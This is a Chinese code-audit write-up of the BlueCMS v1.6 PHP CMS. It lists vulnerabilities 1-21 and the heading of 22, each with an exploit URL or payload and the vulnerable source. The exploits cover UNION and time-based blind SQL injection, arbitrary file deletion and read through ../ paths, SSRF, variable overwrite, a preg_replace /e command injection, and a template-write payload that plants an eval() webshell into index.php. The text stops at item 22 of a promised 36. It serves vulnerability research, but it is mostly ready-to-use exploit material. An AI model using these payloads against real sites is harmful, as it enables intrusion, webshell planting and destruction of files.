代码审计:Bluecms v1.6
漏洞列表如下(共计36个漏洞,附Exp,按时间顺序):
未完待续…
1、user.php 766行处存在任意文件删除漏洞
Exp:``http://127.0.0.3/bluecms/user.php?act=edit_user_info Post:face_pic3=2.php`
elseif($act == 'edit_user_info'){
$user_id = intval($_SESSION['user_id']);
if(empty($user_id)){
return false;
}
$birthday = trim($_POST['birthday']);
$sex = intval($_POST['sex']);
$email = !empty($_POST['email']) ? trim($_POST['email']) : '';
$msn = !empty($_POST['msn']) ? trim($_POST['msn']) : '';
$qq = !empty($_POST['qq']) ? trim($_POST['qq']) : '';
$mobile_phone = !empty($_POST['mobile_phone']) ? trim($_POST['mobile_phone']) : '';
$office_phone = !empty($_POST['office_phone']) ? trim($_POST['office_phone']) : '';
$home_phone = !empty($_POST['home_phone']) ? trim($_POST['home_phone']) : '';
$address = !empty($_POST['address']) ? htmlspecialchars($_POST['address']) : '';
if (!empty($_POST['face_pic1'])){
if (strpos($_POST['face_pic1'], 'http://') != false && strpos($_POST['face_pic1'], 'https://') != false){
showmsg('只支持本站相对路径地址');
}
else{
$face_pic = trim($_POST['face_pic1']);
}
}else{
if(file_exists(BLUE_ROOT.$_POST['face_pic3'])){
@unlink(BLUE_ROOT.$_POST['face_pic3']);
}
}
if(isset($_FILES['face_pic2']['error']) && $_FILES['face_pic2']['error'] == 0){
$face_pic = $image->img_upload($_FILES['face_pic2'],'face_pic');
}
$face_pic = empty($face_pic) ? '' : $face_pic;
$sql = "UPDATE ".table('user')." SET birthday = '$birthday', sex = '$sex', face_pic = '$face_pic', email = '$email', msn = '$msn', qq = '$qq'," .
" mobile_phone = '$mobile_phone', office_phone = '$office_phone', home_phone = '$home_phone', address='$address' WHERE user_id = ".intval($_SESSION['user_id']);
$db->query($sql);
showmsg('更新个人资料成功', 'user.php');
}
2、ad_js.php 19行处存在sql注入漏洞
Exp:view-source:http://127.0.0.3/bluecms/ad_js.php?ad_id=12%20+UNION%20+SELECT+1,2,3,4,5,6,database()
$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
if($ad['time_set'] == 0)
{
$ad_content = $ad['content'];
}
else
{
if($ad['end_time'] < time())
{
$ad_content = $ad['exp_content'];
}
else
{
$ad_content = $ad['content'];
}
}
$ad_content = str_replace('"', '\"',$ad_content);
$ad_content = str_replace("\r", "\\r",$ad_content);
$ad_content = str_replace("\n", "\\n",$ad_content);
echo "<!--\r\ndocument.write(\"".$ad_content."\");\r\n-->\r\n";
3、include/common.fun.php->getip()存在ip伪造漏洞
function getip()
{
if (getenv('HTTP_CLIENT_IP'))
{
$ip = getenv('HTTP_CLIENT_IP');
}
elseif (getenv('HTTP_X_FORWARDED_FOR'))
{ //获取客户端用代理服务器访问时的真实ip 地址
$ip = getenv('HTTP_X_FORWARDED_FOR');
}
elseif (getenv('HTTP_X_FORWARDED'))
{
$ip = getenv('HTTP_X_FORWARDED');
}
elseif (getenv('HTTP_FORWARDED_FOR'))
{
$ip = getenv('HTTP_FORWARDED_FOR');
}
elseif (getenv('HTTP_FORWARDED'))
{
$ip = getenv('HTTP_FORWARDED');
}
else
{
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
4、user.php 955行处存在任意文件删除漏洞
Exp:``http://127.0.0.3/bluecms/user.php?act=del_pic Post:id=2.php`
elseif($act == 'del_pic'){
$id = $_REQUEST['id'];
$db->query("DELETE FROM ".table('company_image')." WHERE path='$id'");
if(file_exists(BLUE_ROOT.$id)){
@unlink(BLUE_ROOT.$id);
}
}
5、user.php 476行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=do_info_edit Post提交post_id=1&title=1&content=1&cat_id=1&area=1&useful_time=1&is_recommend1=1&top_type=1&is_head_line=1&link_man=1&link_phone=1&att1=1&att2=1&top_type1=1&is_head_line1=1&lit_pic=1.php
elseif($act == 'do_info_edit'){
$post_id = intval($_REQUEST['post_id']);
if(empty($post_id)){
return false;
}
$must_att_arr = array();
$nomust_att_arr = array();
$title = !empty($_POST['title']) ? trim($_POST['title']) : '';
if($title == ''){
showmsg('信息标题不能为空');
}
$cat_id = !empty($_POST['cat_id']) ? trim($_POST['cat_id']) : '';
$area = !empty($_POST['area']) ? intval($_POST['area']) : '';
$useful_time = intval($_POST['useful_time']);
$content = !empty($_POST['content']) ? trim($_POST['content']) : '';
if(!empty($content)){
$content = str_replace(' ', ' ', str_replace(array("\r\n", "\r", "\n"), "<br/>", $content));
}
$is_recommend = !empty($_POST['is_recommend']) ? intval($_POST['is_recommend']) : 0;
if($_POST['is_recommend1'] == 0){
if($is_recommend == 1){
$confirm_rec = 1;
$rec_start = $timestamp;
$rec_time = $_POST['rec_time'];
if(!preg_match('/^[1-9][0-9]*$/', $rec_time)){
showmsg('推荐时间格式出错');
}
$condition = " ,rec_start='$rec_start', rec_time='$rec_time' ";
} else {
$rec_time = 0;
$condition = '';
}
} else {
$rec_time = 0;
$condition = '';
}
$top_type = intval($_POST['top_type']);
if($_POST['top_type1'] == 0){
if($top_type != 0){
$confirm_top = 1;
$top_start = $timestamp;
$top_time = $_POST['top_time'];
if(!preg_match('/^[1-9][0-9]*$/', $top_time)){
showmsg('置顶时间格式出错');
}
$condition .= ",top_start='$top_start', top_time='$top_time' ";
} else {
$top_time = 0;
$condition .= '';
}
} else {
$top_time = 0;
$condition .= '';
}
$is_head_line = intval($_POST['is_head_line']);
if($_POST['is_head_line1'] == 0){
if($is_head_line == 1){
$confirm_head = 1;
$head_line_start = $timestamp;
$head_line_time = $_POST['head_line_time'];
if(!preg_match('/^[1-9][0-9]*$/', $head_line_time)){
showmsg('推荐时间格式出错');
}
$condition .= " ,head_line_start='$head_line_start', head_line_time='$head_line_time' ";
} else {
$head_line_time = 0;
$condition .= '';
}
} else {
$head_line_time = 0;
$condition .= '';
}
$link_man = !empty($_POST['link_man']) ? trim($_POST['link_man']) : '';
$link_phone = !empty($_POST['link_phone']) ? trim($_POST['link_phone']) : 0;
$link_email = !empty($_POST['link_email']) ? trim($_POST['link_email']) : '';
$link_qq = !empty($_POST['link_qq']) ? trim($_POST['link_qq']) : 0;
$link_address = !empty($_POST['link_address']) ? trim($_POST['link_address']) : '';
if($link_man==''){
showmsg('联系人姓名不能为空');
}
if($link_phone==''){
showmsg('为了体现信息真实,联系电话不要为空');
}
$must_att_arr = get_att($model_id, $_POST['att1'], 'must_att');
$nomust_att_arr = get_att($model_id, $_POST['att2']);
//交易过程
$rec_service = $db->getone("SELECT id, price FROM ".table('service')." WHERE type='info' and service='rec'");
if($top_type == 1){
$service = 'top1';
} else {
$service = 'top2';
}
$top_service = $db->getone("SELECT id, price FROM ".table('service')." WHERE type='info' and service='$service'");
$head_line_service = $db->getone("SELECT id, price FROM ".table('service')." WHERE type='info' and service='head_line'");
$money = $_SESSION['money'] - $rec_service['price'] * $rec_time - $top_service['price'] * $top_time - $head_line_service['price'] * $head_line_time;
if ($money < 0){
showmsg('对不起,您的余额不足,请充值');
}
if ($confirm_rec == 1) {
$db->query("INSERT INTO ".table('buy_record')." (id, user_id, aid, pid, exp, time)
VALUES ('', '$_SESSION[user_id]', '$post_id', '$rec_service[id]', '$rec_time', '$timestamp'");
}
if ($confirm_top == 1) {
$db->query("INSERT INTO ".table('buy_record')." (id, user_id, aid, pid, exp, time)
VALUES ('', '$_SESSION[user_id]', '$post_id', '$top_service[id]', '$top_time', '$timestamp'");
}
if ($confirm_head == 1) {
$db->query("INSERT INTO ".table('buy_record')." (id, user_id, aid, pid, exp, time)
VALUES ('', '$_SESSION[user_id]', '$post_id', '$top_service[id]', '$head_line_time', '$timestamp'");
}
//从用户账户扣除花费金币
$db->query("UPDATE ".table('user')." SET money='$money' WHERE user_id=$_SESSION[user_id]");
//更新post表SQL语句
$sql = "UPDATE ".table('post')." SET cat_id='$cat_id', area_id='$area', title='$title',
keywords='$keywords', content='$content', link_man='$link_man', link_phone='$link_phone',
is_recommend='$is_recommend', top_type='$top_type', is_head_line='$is_head_line' ".$condition.", link_email='$link_email',
link_qq='$link_qq', link_address='$link_address', useful_time='$useful_time' WHERE post_id=".$post_id;
$db->query($sql);
//插入新属性
$db->query("DELETE FROM ".table('post_att')." WHERE post_id =".$post_id);
insert_att_value($must_att_arr, $post_id);
insert_att_value($nomust_att_arr, $post_id);
//插入新图片
$db->query("DELETE FROM ".table('post_pic')." WHERE post_id = ".$post_id);
for($i=0;$i<4;$i++){
if($_POST['pic'.$i] && file_exists(BLUE_ROOT.$_POST['pic'.$i])){
$sql = "INSERT INTO ".table('post_pic')." (pic_id, post_id, pic_path) VALUES ('', '$post_id', '".$_POST['pic'.$i]."')";
$db->query($sql);
}
}
//如果没有图片,则将信息缩略图设置为默认图片
if (file_exists(BLUE_ROOT.$_POST['lit_pic'])) {
@unlink(BLUE_ROOT.$_POST['lit_pic']);
}
if($_POST['pic0']){
$lit_pic = $image->small_img($_POST['pic0'], 126, 80);
$db->query("UPDATE ".table('post')." SET lit_pic='$lit_pic' WHERE post_id='$post_id'");
}else{
$db->query("UPDATE ".table('post')." SET lit_pic='' WHERE post_id='$post_id'");
}
showmsg('编辑信息成功', 'user.php?act=manage');
}
6、admin/article.php 132行处存在后台sql注入漏洞
Exp:http://127.0.0.3/bluecms/admin/article.php?act=del&id=1 and if(length(select database())=7,1,sleep(10)) 时间盲注
elseif($act == 'del'){
$article = $db->getone("SELECT cid, lit_pic FROM ".table('article')." WHERE id=".$_GET['id']);
$sql = "DELETE FROM ".table('article')." WHERE id=".intval($_GET['id']);
$db->query($sql);
if (file_exists(BLUE_ROOT.$article['lit_pic'])) {
@unlink(BLUE_ROOT.$article['list_pic']);
}
showmsg('删除本地新闻成功', 'article.php?cid='.$article['cid']);
}
7、admin/article.php 85行处存在任意文件删除漏洞
Exp:article.html
如下:
<!DOCTYPE html>
<html>
<head>
<title>Form with File Upload and Additional Parameters</title>
</head>
<body>
<form action="http://127.0.0.3/bluecms/admin/article.php?act=do_edit" method="post" enctype="multipart/form-data">
<input type="hidden" name="title" value="1">
<input type="hidden" name="color" value="1">
<input type="hidden" name="cid" value="1">
<input type="hidden" name="author" value="admin">
<input type="hidden" name="source" value="1">
<input type="hidden" name="is_recommend" value="1">
<input type="hidden" name="is_check" value="1">
<label for="lit_pic1">要删除的文件名:</label>
<input type="text" id="lit_pic1" name="lit_pic1"><br><br>
<label for="lit_pic2">Upload Picture 2:</label>
<input type="file" id="lit_pic2" name="lit_pic2"><br><br>
<input type="submit" value="Submit">
</form>
</body>
</html>
elseif($act == 'do_edit'){
$title = !empty($_POST['title']) ? trim($_POST['title']) : '';
$color = !empty($_POST['color']) ? trim($_POST['color']) : '';
$cid = !empty($_POST['cid']) ? intval($_POST['cid']) : '';
if(empty($cid)){
showmsg('新闻分类不能为空');
}
$author = !empty($_POST['author']) ? trim($_POST['author']) : $_SESSION['admin_name'];
$source = !empty($_POST['source']) ? trim($_POST['source']) : '';
$is_recommend = intval($_POST['is_recommend']);
$is_check = intval($_POST['is_check']);
if((!empty($_POST['lit_pic1']) && !empty($_FILES['lit_pic2']['name'])) || !empty($_FILES['lit_pic2']['name']))
{
if (file_exists(BLUE_ROOT . $_POST['lit_pic1']))
{
@unlink(BLUE_ROOT . $_POST['lit_pic1']);
}
if($_FILES['lit_pic2']['error'] == 0)
{
$lit_pic = $image->img_upload($_FILES['lit_pic2'],'lit_pic');
}
$lit_pic = empty($lit_pic) ? '' : $lit_pic;
if(!empty($lit_pic)){
$lit_pic = $image->small_img($lit_pic, 200, 115);
}
}else{
$lit_pic = !empty($_POST['lit_pic1']) ? $_POST['lit_pic1'] :'';
}
$content = !empty($_POST['content']) ? trim($_POST['content']) : '';
$descript = !empty($_POST['descript']) ? mb_substr($_POST['descript'], 0, 250) : mb_substr(html2text($_POST['content']),0, 250);
if($title == ''){
showmsg('新闻标题不能为空');
}
if($content == ''){
showmsg('新闻内容不能为空');
}
$sql = "UPDATE ".table('article')." SET cid='$cid', title='$title', color='$color', author='$author',
source='$source', lit_pic='$lit_pic', descript='$descript', content='$content',
is_recommend='$is_recommend', is_check='$is_check' WHERE id=".intval($_POST['id']);
$db->query(($sql));
showmsg('编辑新闻成功', 'article.php?cid='.$cid);
}
8、admin/attachment.php 78行处存在后台sql注入漏洞
Exp:http://127.0.0.3/bluecms/admin/attachment.php?act=del&att_id=1 and if(length(select database())=7,1,sleep(10)) 时间盲注
elseif($_REQUEST['act'] == 'del')
{
$sql = "DELETE FROM ".table('attachment')." WHERE att_id = ".$_GET['att_id'];
if(!$db->query($sql)){
showmsg('删除附加属性出错', true);
}
showmsg('删除附加属性成功','attachment.php', true);
}
9、admin/database.php 208行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/admin/article.php?act=del&file_name=../1.php
elseif($act == 'del')
{
$file_name = !empty($_GET['file_name']) ? trim($_GET['file_name']) : '';
$file = BLUE_ROOT.DATA."backup/".$file_name;
if(!@unlink($file))
{
showmsg('删除备份文件失败');
}
else
{
showmsg('删除备份文件成功', 'database.php?act=restore');
}
}
10、admin/flash.php 47行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/admin/flash.php?act=do_edit Post:image_id=1&image_path2=../1.php
elseif($act == 'do_edit'){
if(empty($_POST['image_id'])){
return false;
}
$image_link = !empty($_POST['image_link']) ? trim($_POST['image_link']) : '';
$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : '';
$image_path = !empty($_POST['image_path']) ? trim($_POST['image_path']) : '';
if (!empty($_POST['image_path'])){
if (strpos($_POST['image_path'], 'http://') != false && strpos($_POST['image_path'], 'https://') != false){
showmsg('只支持本站相对路径地址');
}
else{
$link_logo = trim($_POST['image_path']);
}
}else{
if(file_exists(BLUE_ROOT.$_POST['image_path2'])){
@unlink(BLUE_ROOT.$_POST['image_path2']);
}
}
if(isset($_FILES['image_path1']['error']) && $_FILES['image_path1']['error'] == 0){
$image_path = $image->img_upload($_FILES['image_path1'],'flash');
}
$image_path = empty($image_path) ? '' : $image_path;
if(!$db->query("UPDATE ".table('flash_image')." SET image_path='$image_path', image_link='$image_link', show_order='$show_order' WHERE image_id=".intval($_POST['image_id']))){
showmsg('更新flash图片出错', true);
}else{
showmsg('更新flash图片成功', 'flash.php', true);
}
}
elseif($act == 'del'){
if(empty($_GET['image_id'])){
return false;
}
$flash = $db->getone("SELECT image_path FROM ".table('flash_image')." WHERE image_id =".intval($_GET['image_id']));
if(file_exists(BLUE_ROOT.$flash['image_path'])){
@unlink(BLUE_ROOT.$flash['image_path']);
}
if(!$db->query("DELETE FROM ".table('flash_image')." WHERE image_id = ".intval($_GET['image_id']))){
showmsg('删除Flash图片出错', true);
}else{
showmsg('删除Flash图片成功!','flash.php', true);
}
}
11、admin/flash.php 47行处存在SSRF漏洞
Exp:http://127.0.0.3/bluecms/admin/flash.php?act=do_edit Post:image_id=1&image_path=http://网站 触发:点击flash链接(逻辑漏洞,strpos($_POST['image_path'], 'http://') != false,strpos返回的是位置,如果'http://'在首位,返回0.而0不等于false,从而绕过判断)
elseif($act == 'do_edit'){
if(empty($_POST['image_id'])){
return false;
}
$image_link = !empty($_POST['image_link']) ? trim($_POST['image_link']) : '';
$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : '';
$image_path = !empty($_POST['image_path']) ? trim($_POST['image_path']) : '';
if (!empty($_POST['image_path'])){
if (strpos($_POST['image_path'], 'http://') != false && strpos($_POST['image_path'], 'https://') != false){
showmsg('只支持本站相对路径地址');
}
else{
$link_logo = trim($_POST['image_path']);
}
}else{
if(file_exists(BLUE_ROOT.$_POST['image_path2'])){
@unlink(BLUE_ROOT.$_POST['image_path2']);
}
}
if(isset($_FILES['image_path1']['error']) && $_FILES['image_path1']['error'] == 0){
$image_path = $image->img_upload($_FILES['image_path1'],'flash');
}
$image_path = empty($image_path) ? '' : $image_path;
if(!$db->query("UPDATE ".table('flash_image')." SET image_path='$image_path', image_link='$image_link', show_order='$show_order' WHERE image_id=".intval($_POST['image_id']))){
showmsg('更新flash图片出错', true);
}else{
showmsg('更新flash图片成功', 'flash.php', true);
}
}
elseif($act == 'del'){
if(empty($_GET['image_id'])){
return false;
}
$flash = $db->getone("SELECT image_path FROM ".table('flash_image')." WHERE image_id =".intval($_GET['image_id']));
if(file_exists(BLUE_ROOT.$flash['image_path'])){
@unlink(BLUE_ROOT.$flash['image_path']);
}
if(!$db->query("DELETE FROM ".table('flash_image')." WHERE image_id = ".intval($_GET['image_id']))){
showmsg('删除Flash图片出错', true);
}else{
showmsg('删除Flash图片成功!','flash.php', true);
}
}
12、admin/link.php 50行处存在SSRF漏洞
Exp:http://127.0.0.3/bluecms/admin/link.php?act=do_edit Post:link_logo=http://网站 触发:点击网站上导航链接
elseif($act == 'do_edit'){
$link_name = !empty($_POST['link_name']) ? trim($_POST['link_name']) : '';
$link_site = !empty($_POST['link_site']) ? trim($_POST['link_site']) : '';
$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : 0;
if (!empty($_POST['link_logo'])){
if (strpos($_POST['link_logo'], 'http://') != false && strpos($_POST['link_logo'], 'https://') != false){
showmsg('只支持本站相对路径地址');
}
else{
$link_logo = trim($_POST['link_logo']);
}
}else{
if(file_exists(BLUE_ROOT.$_POST['link_logo2'])){
@unlink(BLUE_ROOT.$_POST['link_logo2']);
}
}
if(isset($_FILES['link_logo1']['error']) && $_FILES['link_logo1']['error'] == 0){
$link_logo = $image->img_upload($_FILES['link_logo1'],'linklogo');
}
$link_logo = empty($link_logo) ? '' : $link_logo;
$sql = "UPDATE ".table('link')." SET linkname = '$link_name', linksite = '$link_site', linklogo = '$link_logo', showorder = '$show_order' WHERE linkid=".intval($_REQUEST['linkid']);
if(!$db->query($sql)){
showmsg('编辑链接失败');
}else{
showmsg('编辑链接成功','link.php');
}
}
13、admin/link.php 50行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/admin/link.php?act=do_edit Post:link_logo2=../1.php
elseif($act == 'do_edit'){
$link_name = !empty($_POST['link_name']) ? trim($_POST['link_name']) : '';
$link_site = !empty($_POST['link_site']) ? trim($_POST['link_site']) : '';
$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : 0;
if (!empty($_POST['link_logo'])){
if (strpos($_POST['link_logo'], 'http://') != false && strpos($_POST['link_logo'], 'https://') != false){
showmsg('只支持本站相对路径地址');
}
else{
$link_logo = trim($_POST['link_logo']);
}
}else{
if(file_exists(BLUE_ROOT.$_POST['link_logo2'])){
@unlink(BLUE_ROOT.$_POST['link_logo2']);
}
}
if(isset($_FILES['link_logo1']['error']) && $_FILES['link_logo1']['error'] == 0){
$link_logo = $image->img_upload($_FILES['link_logo1'],'linklogo');
}
$link_logo = empty($link_logo) ? '' : $link_logo;
$sql = "UPDATE ".table('link')." SET linkname = '$link_name', linksite = '$link_site', linklogo = '$link_logo', showorder = '$show_order' WHERE linkid=".intval($_REQUEST['linkid']);
if(!$db->query($sql)){
showmsg('编辑链接失败');
}else{
showmsg('编辑链接成功','link.php');
}
}
14、admin/info.php 281行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/admin/info.php?act=do_edit Post:post_id=1&title=1&content=1&cat_id=1&area=1&useful_time=1&is_recommend1=1&top_type=1&is_head_line=1&link_man=1&link_phone=1&att1=1&att2=1&top_type1=1&is_head_line1=1&lit_pic=1.php
elseif($act == 'do_edit')
{
$must_att_arr = array();
$nomust_att_arr = array();
$title = !empty($_POST['title']) ? trim($_POST['title']) : '';
$cat_id = !empty($_POST['cat_id']) ? trim($_POST['cat_id']) : '';
$area = !empty($_POST['area']) ? intval($_POST['area']) : '';
$useful_time = intval($_POST['useful_time']);
$content = !empty($_POST['content']) ? trim($_POST['content']) : '';
if(!empty($content))
{
$content = str_replace(' ', ' ', str_replace(array("\r\n", "\r", "\n"), "<br/>", $content));
}
$is_check = !empty($_POST['is_check']) ? intval($_POST['is_check']) : 0;
$is_recommend = !empty($_POST['is_recommend']) ? intval($_POST['is_recommend']) : 0;
if($_POST['is_recommend1'] == 0)
{
if ($is_recommend == 1)
{
$rec_start = $timestamp;
$rec_time = $_POST['rec_time'];
if(!preg_match('/^[1-9][0-9]*$/', $rec_time))
{
showmsg('推荐时间格式出错');
}
$condition = " ,rec_start='$rec_start', rec_time='$rec_time' ";
}
else
{
$rec_time = '';
$condition = '';
}
}
else
{
$rec_time = '';
if ($is_recommend == 0)
{
$condition = " ,rec_start='', rec_time='' ";
}
else
{
$condition = '';
}
}
$top_type = !empty($_POST['top_type']) ? intval($_POST['top_type']) : 0;
if ($_POST['top_type1'] == 0)
{
if ($top_type != 0)
{
$top_start = $timestamp;
$top_time = $_POST['top_time'];
if(!preg_match('/^[1-9][0-9]*$/', $top_time))
{
showmsg('置顶时间格式出错');
}
$condition .= ",top_start='$top_start', top_time='$top_time' ";
}
else
{
$top_time = '';
$condition .= '';
}
}
else
{
$top_time = '';
if ($top_type == 0)
{
$condition = " ,top_start='', top_time='' ";
}
else
{
$condition = '';
}
}
$is_head_line = intval($_POST['is_head_line']);
if($_POST['is_head_line1'] == 0)
{
if($is_head_line == 1)
{
$confirm_head = 1;
$head_line_start = $timestamp;
$head_line_time = $_POST['head_line_time'];
if(!preg_match('/^[1-9][0-9]*$/', $head_line_time))
{
showmsg('头条时间格式出错');
}
$condition .= " ,head_line_start='$head_line_start', head_line_time='$head_line_time' ";
}
else
{
$head_line_time = 0;
$condition .= '';
}
}
else
{
$head_line_time = 0;
$condition .= '';
}
$link_man = !empty($_POST['link_man']) ? trim($_POST['link_man']) : '';
$link_phone = !empty($_POST['link_phone']) ? trim($_POST['link_phone']) : 0;
$link_email = !empty($_POST['link_email']) ? trim($_POST['link_email']) : '';
$link_qq = !empty($_POST['link_qq']) ? trim($_POST['link_qq']) : 0;
$link_address = !empty($_POST['link_address']) ? trim($_POST['link_address']) : '';
if($title == '')
{
showmsg('信息标题不能为空');
}
if($top_type==0 && $top_time > 0)
{
showmsg('只有在开启置顶功能时,才能设置置顶时间');
}
if($link_man=='')
{
showmsg('联系人姓名不能为空');
}
if($link_phone=='')
{
showmsg('为了体现信息真实,联系电话不要为空');
}
$must_att_arr = get_att($model_id, $_POST['att1'], 'must_att');
$nomust_att_arr = get_att($model_id, $_POST['att2']);
$sql = "UPDATE ".table('post')."
SET cat_id='$cat_id', area_id='$area', title='$title', keywords='$keywords',
content='$content', link_man='$link_man', link_phone='$link_phone',
link_email='$link_email', link_qq='$link_qq', link_address='$link_address',
useful_time='$useful_time', is_check='$is_check', is_recommend='$is_recommend' ".
$condition.", top_type='$top_type', is_head_line='$is_head_line'
WHERE post_id=".intval($post_id);
$db->query($sql);
$db->query("DELETE FROM ".table('post_att')." WHERE post_id =".intval($post_id));
insert_att_value($must_att_arr, $post_id);
insert_att_value($nomust_att_arr, $post_id);
$db->query("DELETE FROM ".table('post_pic')." WHERE post_id=".intval($post_id));
for($i=0;$i<4;$i++)
{
if($_POST['pic'.$i] && file_exists(BLUE_ROOT.$_POST['pic'.$i]))
{
$sql = "INSERT INTO ".table('post_pic')." (pic_id, post_id, pic_path) VALUES ('', '$post_id', '".$_POST['pic'.$i]."')";
$db->query($sql);
}
}
if (file_exists(BLUE_ROOT.$_POST['lit_pic']))
{
@unlink(BLUE_ROOT.$_POST['lit_pic']);
}
if($_POST['pic0'])
{
include_once(BLUE_ROOT."include/upload.class.php");
$image = new upload();
$lit_pic = $image->small_img($_POST['pic0'],126, 80);
$db->query("UPDATE ".table('post')." SET lit_pic='$lit_pic' WHERE post_id='$post_id'");
}
else
{
$db->query("UPDATE ".table('post')." SET lit_pic='' WHERE post_id='$post_id'");
}
showmsg('编辑信息成功', 'info.php?cid='.get_parentid($cat_id));
}
15、admin/info.php 526行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/admin/info.php?act=del_pic Post:id=../1.php
elseif($act == 'del_pic')
{
$id = $_REQUEST['id'];
$db->query("DELETE FROM ".table('post_pic')." WHERE pic_path='$id'");
if(file_exists(BLUE_ROOT.$id))
{
@unlink(BLUE_ROOT.$id);
}
}
16、admin/link.php 79行处存在任意文件删除漏洞
Exp:http://127.0.0.3/bluecms/admin/link.php?act=del&linkid=1 Post:link_logo=../1.php
elseif($act == 'del'){
if(empty($_GET['linkid'])){
return false;
}
$link = $db->getone("SELECT linklogo FROM ".table('link')." WHERE linkid=".intval($_GET['linkid']));
if(file_exists(BLUE_ROOT.$link['linklogo'])){
@unlink(BLUE_ROOT.$link['linklogo']);
}
$sql = "DELETE FROM ".table('link')." WHERE linkid=".intval($_GET['linkid']);
if(!$db->query($sql)){
showmsg('删除友情链接失败');
}else{
showmsg('删除友情链接成功','link.php');
}
}
17、admin/nav.php 63行存在后台sql注入漏洞
Exp:http://127.0.0.3/bluecms/admin/nav.php?act=edit&navid=1 union select 1,2,3,4,user(),6 limit 1,1
elseif($act=='edit')
{
$sql = "select * from ".table('navigate')." where navid = ".$_GET['navid'];
$nav = $db->getone($sql);
$smarty->assign('nav',$nav);
$smarty->assign('act', $act );
$smarty->display('nav_info.htm');
}
18、admin/tpl_manage.php 47行处存在任意文件写入漏洞,可写入webshell _
_Exp:http://127.0.0.3/bluecms/admin/tpl_manage.php?act=do_edit Post:tpl_name=../../index.php&tpl_content=<?php eval($_POST[1]);?>
elseif($act == 'do_edit'){
$tpl_name = !empty($_POST['tpl_name']) ? trim($_POST['tpl_name']) : '';
$tpl_content = !empty($_POST['tpl_content']) ? deep_stripslashes($_POST['tpl_content']) : '';
if(empty($tpl_name)){
return false;
}
$tpl = BLUE_ROOT.'templates/default/'.$tpl_name;
if(!$handle = @fopen($tpl, 'wb')){
showmsg("打开目标模版文件 $tpl 失败");
}
if(fwrite($handle, $tpl_content) === false){
showmsg('写入目标 $tpl 失败');
}
fclose($handle);
showmsg('编辑模板成功', 'tpl_manage.php');
}
19、admin/tpl_manage.php 35行处存在任意文件读取漏洞
Exp:http://127.0.0.3/bluecms/admin/tpl_manage.php?act=edit&tpl_name=../../1.txt
elseif($act == 'edit'){
$file = $_GET['tpl_name'];
if(!$handle = @fopen(BLUE_ROOT.'templates/default/'.$file, 'rb')){
showmsg('打开目标模板文件失败');
}
$tpl['content'] = fread($handle, filesize(BLUE_ROOT.'templates/default/'.$file));
$tpl['content'] = htmlentities($tpl['content'], ENT_QUOTES, GB2312);
fclose($handle);
$tpl['name'] = $file;
template_assign(array('current_act', 'tpl'), array('编辑模板', $tpl));
$smarty->display('tpl_info.htm');
}
20、include/filter.inc.php 11行处存在变量覆盖漏洞(影响user.php)
Exp:http://127.0.0.3/bluecms/user.php?{变量名}={变量值}
foreach (array($_GET, $_POST) as $v)
{
foreach ($v as $k1 => $v1)
{
$$k1 = filter($k1, $v1);
}
}
21、uc_client/lib/uccode.class.php 38行处存在命令执行漏洞
Exp:$message = "[email=attacker@example.com]Hello; system('ls'); [/email]";
function complie($message) {
$message = htmlspecialchars($message);
if(strpos($message, '[/code]') !== FALSE) {
$message = preg_replace("/\s*\[code\](.+?)\[\/code\]\s*/ies", "\$this->codedisp('\\1')", $message);
}
if(strpos($message, '[/url]') !== FALSE) {
$message = preg_replace("/\[url(=((https?|ftp|gopher|news|telnet|rtsp|mms|callto|bctp|ed2k|thunder|synacast){1}:\/\/|www\.)([^\[\"']+?))?\](.+?)\[\/url\]/ies", "\$this->parseurl('\\1', '\\5')", $message);
}
if(strpos($message, '[/email]') !== FALSE) {
$message = preg_replace("/\[email(=([a-z0-9\-_.+]+)@([a-z0-9\-_]+[.][a-z0-9\-_.]+))?\](.+?)\[\/email\]/ies", "\$this->parseemail('\\1', '\\4')", $message);
}
$message = str_replace(array(
'[/color]', '[/size]', '[/font]', '[/align]', '[b]', '[/b]',
'[i]', '[/i]', '[u]', '[/u]', '[list]', '[list=1]', '[list=a]',
'[list=A]', '[*]', '[/list]', '[indent]', '[/indent]', '[/float]'
), array(
'</font>', '</font>', '</font>', '</p>', '<strong>', '</strong>', '<i>',
'</i>', '<u>', '</u>', '<ul>', '<ul type="1">', '<ul type="a">',
'<ul type="A">', '<li>', '</ul>', '<blockquote>', '</blockquote>', '</span>'
), preg_replace(array(
"/\[color=([#\w]+?)\]/i",
"/\[size=(\d+?)\]/i",
"/\[size=(\d+(\.\d+)?(px|pt|in|cm|mm|pc|em|ex|%)+?)\]/i",
"/\[font=([^\[\<]+?)\]/i",
"/\[align=(left|center|right)\]/i",
"/\[float=(left|right)\]/i"
), array(
"<font color=\"\\1\">",
"<font size=\"\\1\">",
"<font style=\"font-size: \\1\">",
"<font face=\"\\1 \">",
"<p align=\"\\1\">",
"<span style=\"float: \\1;\">"
), $message));
if(strpos($message, '[/quote]') !== FALSE) {
$message = preg_replace("/\s*\[quote\][\n\r]*(.+?)[\n\r]*\[\/quote\]\s*/is", $this->tpl_quote(), $message);
}
if(strpos($message, '[/img]') !== FALSE) {
$message = preg_replace(array(
"/\[img\]\s*([^\[\<\r\n]+?)\s*\[\/img\]/ies",
"/\[img=(\d{1,4})[x|\,](\d{1,4})\]\s*([^\[\<\r\n]+?)\s*\[\/img\]/ies"
), array(
"\$this->bbcodeurl('\\1', '<img src=\"%s\" border=\"0\" alt=\"\" />')",
"\$this->bbcodeurl('\\3', '<img width=\"\\1\" height=\"\\2\" src=\"%s\" border=\"0\" alt=\"\" />')"
), $message);
}
for($i = 0; $i <= $this->uccode['pcodecount']; $i++) {
$message = str_replace("[\tUCENTER_CODE_$i\t]", $this->uccode['codehtml'][$i], $message);
}
return nl2br(str_replace(array("\t", ' ', ' '), array(' ', ' ', ' '), $message));
}
22、comment.php 113行处存在sql注入漏洞
